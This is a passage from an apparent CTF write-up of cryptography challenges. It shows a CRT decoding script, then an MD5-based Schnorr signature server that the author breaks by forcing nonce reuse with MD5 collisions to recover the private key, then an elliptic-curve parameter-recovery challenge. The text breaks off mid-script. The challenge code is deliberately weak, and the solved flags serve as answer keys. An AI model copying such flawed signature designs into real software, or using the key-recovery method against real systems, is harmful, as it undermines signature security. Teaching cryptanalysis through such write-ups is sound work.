class="line"><span class="cl"><span class="kn">from</span> <span class="nn">sympy.ntheory.modular</span> <span class="kn">import</span> <span class="n">crt</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">M_1</span><span class="p">)):</span> </span></span><span class="line"><span class="cl"> <span class="n">m</span> <span class="o">=</span> <span class="p">[</span><span class="mi">61</span><span class="p">,</span> <span class="mi">19</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">v</span> <span class="o">=</span> <span class="p">[</span><span class="n">M_1</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">M_2</span><span class="p">[</span><span class="n">i</span><span class="p">]]</span> </span></span><span class="line"><span class="cl"><span class="c1"># Use crt() method </span> </span></span><span class="line"><span class="cl"> <span class="n">crt_m_v</span> <span class="o">=</span> <span class="n">crt</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="n">v</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">res</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">crt_m_v</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s1">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="nb">chr</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">res</span><span class="p">]))</span> </span></span></code></pre></div><h3 id="results-2">Results</h3> <p>Flag is: <strong>HTB{l00k_@t_7h3_st4rs!!!}</strong></p> <h2 id="colliding-heritage">Colliding Heritage</h2> <ul> <li> <p><strong>Description:</strong> As you arrive at the location of the relic, you discover an ancient tomb that appears to have no visible entrance. However, a scan of the area reveals the presence of unusual RF signals coming from a specific location. With the help of your team, you manage to create an interface to communicate with the signal-emitting device. Unfortunately, the device only grants access to descendants of the pharaoh’s left hand. Can you find a way to enter the tomb?</p> </li> <li> <p><strong>Category:</strong> Cryptography</p> </li> <li> <p><strong>Difficulty:</strong> Medium</p> </li> </ul> <p>We were given a file below:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="ch">#!/usr/bin/env python3</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">signal</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">secrets</span> <span class="kn">import</span> <span class="n">randbelow</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">md5</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">isPrime</span><span class="p">,</span> <span class="n">getPrime</span><span class="p">,</span> <span class="n">long_to_bytes</span><span class="p">,</span> <span class="n">bytes_to_long</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">FLAG</span> <span class="o">=</span> <span class="s2">&#34;HTB{???????????????????????????}&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">MD5chnorr</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="c1"># while True:</span> </span></span><span class="line"><span class="cl"> <span class="c1"># self.q = getPrime(128)</span> </span></span><span class="line"><span class="cl"> <span class="c1"># self.p = 2*self.q + 1</span> </span></span><span class="line"><span class="cl"> <span class="c1"># if isPrime(self.p):</span> </span></span><span class="line"><span class="cl"> <span class="c1"># break</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">p</span> <span class="o">=</span> <span class="mh">0x16dd987483c08aefa88f28147702e51eb</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">p</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">//</span> <span class="mi">2</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">g</span> <span class="o">=</span> <span class="mi">3</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">=</span> <span class="n">randbelow</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">q</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">g</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">H</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">msg</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">bytes_to_long</span><span class="p">(</span><span class="n">md5</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span><span class="o">.</span><span class="n">digest</span><span class="p">())</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">q</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">sign</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">msg</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">k</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">H</span><span class="p">(</span><span class="n">msg</span> <span class="o">+</span> <span class="n">long_to_bytes</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;</span><span class="si">{</span><span class="n">k</span> <span class="si">= }</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">g</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">)</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">q</span> </span></span><span class="line"><span class="cl"> <span class="n">e</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">H</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="n">r</span><span class="p">)</span> <span class="o">+</span> <span class="n">msg</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span> <span class="o">=</span> <span class="p">(</span><span class="n">k</span> <span class="o">-</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">*</span> <span class="n">e</span><span class="p">)</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">q</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">e</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">verify</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">msg</span><span class="p">,</span> <span class="n">sig</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="p">,</span> <span class="n">e</span> <span class="o">=</span> <span class="n">sig</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="p">(</span><span class="mi">0</span> <span class="o">&lt;</span> <span class="n">s</span> <span class="o">&lt;</span> <span class="bp">self</span><span class="o">.</span><span class="n">q</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="kc">False</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="p">(</span><span class="mi">0</span> <span class="o">&lt;</span> <span class="n">e</span> <span class="o">&lt;</span> <span class="bp">self</span><span class="o">.</span><span class="n">q</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="kc">False</span> </span></span><span class="line"><span class="cl"> <span class="n">rv</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">g</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">)</span> <span class="o">*</span> <span class="nb">pow</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">y</span><span class="p">,</span> <span class="n">e</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">)</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">p</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">q</span> </span></span><span class="line"><span class="cl"> <span class="n">ev</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">H</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="n">rv</span><span class="p">)</span> <span class="o">+</span> <span class="n">msg</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">ev</span> <span class="o">==</span> <span class="n">e</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">menu</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;[S]ign a message&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;[V]erify a signature&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nb">input</span><span class="p">(</span><span class="s1">&#39;&gt; &#39;</span><span class="p">)</span><span class="o">.</span><span class="n">upper</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">md5chnorr</span> <span class="o">=</span> <span class="n">MD5chnorr</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;g:&#39;</span><span class="p">,</span> <span class="n">md5chnorr</span><span class="o">.</span><span class="n">g</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;y:&#39;</span><span class="p">,</span> <span class="n">md5chnorr</span><span class="o">.</span><span class="n">y</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;p:&#39;</span><span class="p">,</span> <span class="n">md5chnorr</span><span class="o">.</span><span class="n">p</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">choice</span> <span class="o">=</span> <span class="n">menu</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">choice</span> <span class="o">==</span> <span class="s1">&#39;S&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">msg</span> <span class="o">=</span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="nb">input</span><span class="p">(</span><span class="s1">&#39;Enter message&gt; &#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="sa">b</span><span class="s1">&#39;I am the left hand&#39;</span> <span class="ow">in</span> <span class="n">msg</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;No!&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">sig</span> <span class="o">=</span> <span class="n">md5chnorr</span><span class="o">.</span><span class="n">sign</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Signature:&#39;</span><span class="p">,</span> <span class="n">sig</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">choice</span> <span class="o">==</span> <span class="s1">&#39;V&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">msg</span> <span class="o">=</span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="nb">input</span><span class="p">(</span><span class="s1">&#39;Enter message&gt; &#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">input</span><span class="p">(</span><span class="s1">&#39;Enter s&gt; &#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">e</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">input</span><span class="p">(</span><span class="s1">&#39;Enter e&gt; &#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">md5chnorr</span><span class="o">.</span><span class="n">verify</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">e</span><span class="p">)):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">msg</span> <span class="o">==</span> <span class="sa">b</span><span class="s1">&#39;I am the left hand&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">FLAG</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Valid signature!&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Invalid signature!&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Invalid choice...&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">&#39;__main__&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">signal</span><span class="o">.</span><span class="n">alarm</span><span class="p">(</span><span class="mi">30</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span></code></pre></div><h3 id="initial-analysis-3">Initial Analysis</h3> <p>This challenge implements the <a href="https://en.wikipedia.org/wiki/Schnorr_signature" target="_blank" rel="noopener">Schnorr signature</a>. We were given 4 parameters including the generator $g$, prime $q,p=2*q+1$ and $y=g^{x} [pq]$. To get the flag, we have to submit to <code>verify</code> function a message with its signature such that there is a string <code>I am the left hand</code> in the message. However we can not create signature for any message that has this string via function <code>sign</code>. To solved this challenge, i create a signature by hand by retriving the private key $x$ in <code>sign</code> function.</p> <h3 id="solution">Solution</h3> <p>After reading on wiki, i noticed a vulnerability section <code>Key leakage from nonce reuse</code>. If we create two signatures with the same nonce $k$, then we have:</p> <p>$$s_1= k-xe_1 [q]$$</p> <p>$$s_2= k-xe_2 [q]$$</p> <p>Now we can easily get the private key $x$:</p> <p>$$x = (s_2 - s_1)(e_1e_2)^{-1}[q]$$</p> <p>But how can we create two signatures with the same $k$? From the source we know that $k$ is actually <code>md5(msg|x)</code>. We can submit any $msg$ we want, so i immediately think of creating the md5 identical-prefix collision using <a href="https://github.com/cr-marcstevens/hashclash" target="_blank" rel="noopener">Hashclash</a>. Hashclash will help us to find 2 messages of length 64 that has the same md5 hash, therefore <code>md5(msg|x)</code> or $k$ of these messages will be the same.</p> <p>After getting $x$, with any message that has the required string we can easily compute $k$ and then $r$, create our own signature $e$ and submit to server to get the flag.</p> <p>Flag is: <strong>HTB{w3ll_y3s_bu7_4c7ual1y_n0…}</strong></p> <h2 id="elliptic-labyrinth">Elliptic Labyrinth</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1w4QyL7cKzhcZJ_qqakudh6fXLtj8mk6p/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> As you navigate through the labyrinth inside the tomb, you encounter GPS inaccuracies that make it difficult to determine the correct path to the exit. Can you overcome the technical issues and use your instincts to find your way out of the maze?</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Cryptography</p> </li> <li> <p><strong>Difficulty:</strong> Medium</p> </li> </ul> <p>The server script is shown below:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os</span><span class="o">,</span> <span class="nn">json</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">sha256</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">random</span> <span class="kn">import</span> <span class="n">randint</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">getPrime</span><span class="p">,</span> <span class="n">long_to_bytes</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.Padding</span> <span class="kn">import</span> <span class="n">pad</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">sage.all_cmdline</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">secret</span> <span class="kn">import</span> <span class="n">FLAG</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">ECC</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">bits</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">p</span> <span class="o">=</span> <span class="n">getPrime</span><span class="p">(</span><span class="n">bits</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">b</span> <span class="o">=</span> <span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">gen_random_point</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">EllipticCurve</span><span class="p">(</span><span class="n">GF</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">),</span> <span class="p">[</span><span class="bp">self</span><span class="o">.</span><span class="n">a</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">b</span><span class="p">])</span><span class="o">.</span><span class="n">random_point</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">menu</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;1. Get parameters of path&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;2. Get point in path&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;3. Try to exit the labyrinth&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">option</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">option</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">ec</span> <span class="o">=</span> <span class="n">ECC</span><span class="p">(</span><span class="mi">512</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="kc">True</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">choice</span> <span class="o">=</span> <span class="n">menu</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">choice</span> <span class="o">==</span> <span class="s1">&#39;1&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span> <span class="o">=</span> <span class="n">randint</span><span class="p">(</span><span class="n">ec</span><span class="o">.</span><span class="n">p</span><span class="o">.</span><span class="n">bit_length</span><span class="p">()</span> <span class="o">//</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">ec</span><span class="o">.</span><span class="n">p</span><span class="o">.</span><span class="n">bit_length</span><span class="p">()</span> <span class="o">//</span> <span class="mi">3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;p&#39;</span><span class="p">:</span> <span class="nb">hex</span><span class="p">(</span><span class="n">ec</span><span class="o">.</span><span class="n">p</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;a&#39;</span><span class="p">:</span> <span class="nb">hex</span><span class="p">(</span><span class="n">ec</span><span class="o">.</span><span class="n">a</span> <span class="o">&gt;&gt;</span> <span class="n">r</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;b&#39;</span><span class="p">:</span> <span class="nb">hex</span><span class="p">(</span><span class="n">ec</span><span class="o">.</span><span class="n">b</span> <span class="o">&gt;&gt;</span> <span class="n">r</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">}))</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">choice</span> <span class="o">==</span> <span class="s1">&#39;2&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">A</span> <span class="o">=</span> <span class="n">ec</span><span class="o">.</span><span class="n">gen_random_point</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">({</span><span class="s1">&#39;x&#39;</span><span class="p">:</span> <span class="nb">hex</span><span class="p">(</span><span class="n">A</span><span class="p">[</span><span class="mi">0</span><span class="p">]),</span> <span class="s1">&#39;y&#39;</span><span class="p">:</span> <span class="nb">hex</span><span class="p">(</span><span class="n">A</span><span class="p">[</span><span class="mi">1</span><span class="p">])}))</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">choice</span> <span class="o">==</span> <span class="s1">&#39;3&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">iv</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">urandom</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">key</span> <span class="o">=</span> <span class="n">sha256</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">ec</span><span class="o">.</span><span class="n">a</span><span class="p">,</span> <span class="n">ec</span><span class="o">.</span><span class="n">b</span><span class="p">,</span> <span class="n">ec</span><span class="o">.</span><span class="n">p</span><span class="p">)))</span><span class="o">.</span><span class="n">digest</span><span class="p">()[:</span><span class="mi">16</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">flag</span> <span class="o">=</span> <span class="n">pad</span><span class="p">(</span><span class="n">FLAG</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;iv&#39;</span><span class="p">:</span> <span class="n">iv</span><span class="o">.</span><span class="n">hex</span><span class="p">(),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;enc&#39;</span><span class="p">:</span> <span class="n">cipher</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span><span class="o">.</span><span class="n">hex</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="p">}))</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Bye.&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">exit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">&#39;__main__&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span></code></pre></div><h3 id="problem-statement-3">Problem Statement</h3> <p>The program generates random secret elliptic curve parameters and allows the user to:</p> <ul> <li> <p>Option 1: Obtain the modulus <code>p</code> and a few MSB bits of ECC parameters.</p> </li> <li> <p>Option 2: Obtain a random point on the curve.</p> </li> <li> <p>Option 3: Provide the encrypted FLAG.</p> </li> </ul> <p>Our mission is to decrypt the flag.</p> <h3 id="initial-analysis-4">Initial analysis</h3> <h4 id="what-we-need-to-decrypt-the-flag">What we need to decrypt the flag?</h4> <p>Obviously, we cannot break the AES to find the flag without the <code>key</code>. To recover the <code>key</code>, we need to know all elliptic curve&rsquo;s parameters, which are <code>a</code>, <code>b</code> and <code>p</code>. We already known <code>p</code>, so what we do is trying to retrieve <code>a</code> and <code>b</code> from the information provided by the server.</p> <h4 id="having-many-points-on-the-curve">Having many points on the curve</h4> <p>Every point $P(x, y)$ belonging to this elliptic curve must satisfy the equation: $y^2 \equiv x^3 + ax + b (\text{mod } p)$. To find <code>a</code> and <code>b</code> in <code>p</code>, we must at least have a system of 2 equations like this. Fortunately, the server allows user to generate many points.</p> <h3 id="solution-method-3">Solution Method</h3> <p>Suppose we have two different points $M(x_m, y_m)$, $N(x_n, y_n)$ in the curve. We recover $a,b$ by below formulas:</p> <p>$a \equiv (y^2_m - y^2_n - (x^3_m - x^3_n))(x_m - x_n)^{-1} (\text{mod } p)$</p> <p>$b \equiv y^2_m - x^3_m - ax_m (\text{mod } p)$</p> <p>The script:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">recover</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">M</span><span class="p">,</span> <span class="n">N</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">x1</span><span class="p">,</span> <span class="n">y1</span> <span class="o">=</span> <span class="n">M</span> </span></span><span class="line"><span class="cl"> <span class="n">x2</span><span class="p">,</span> <span class="n">y2</span> <span class="o">=</span> <span class="n">N</span> </span></span><span class="line"><span class="cl"> <span class="n">a</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">x1</span> <span class="o">-</span> <span class="n">x2</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">y1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="o">-</span> <span class="nb">pow</span><span class="p">(</span><span class="n">y2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="o">-</span> <span class="p">(</span><span class="nb">pow</span><span 